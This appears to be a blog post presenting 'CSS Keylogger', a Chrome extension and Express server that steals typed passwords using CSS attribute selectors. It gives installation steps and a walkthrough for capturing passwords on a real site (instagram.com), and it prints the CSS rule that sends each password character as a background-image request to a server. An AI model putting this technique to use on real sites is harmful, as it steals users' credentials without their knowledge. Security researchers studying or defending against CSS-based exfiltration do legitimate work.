Categories: Kali Linux

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

CSS Keylogger is a Chrome extension and Express server that exploits keylogging abilities of CSS. Using a simple script one can create a css file that will send a custom request for every ASCII character.

Setup Chrome extension

  1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension in the directory which you downloaded this repository.

Also Read Volatility Framework – Volatile memory extraction utility framework

Setup Express server

  1. yarn
  2. yarn start

Haxking l33t passw0rds

  1. Open a website that uses a controlled component framework such as React. https://instagram.com.
  2. Press the extension C on the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the express server.

How CSS Keylogger works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from here.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

R K

Recent Posts

How to Prevent Software Supply Chain Attacks

What is a Software Supply Chain Attack? A software supply chain attack occurs when a…

16 hours ago

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

1 week ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

2 weeks ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

2 weeks ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

2 weeks ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

2 weeks ago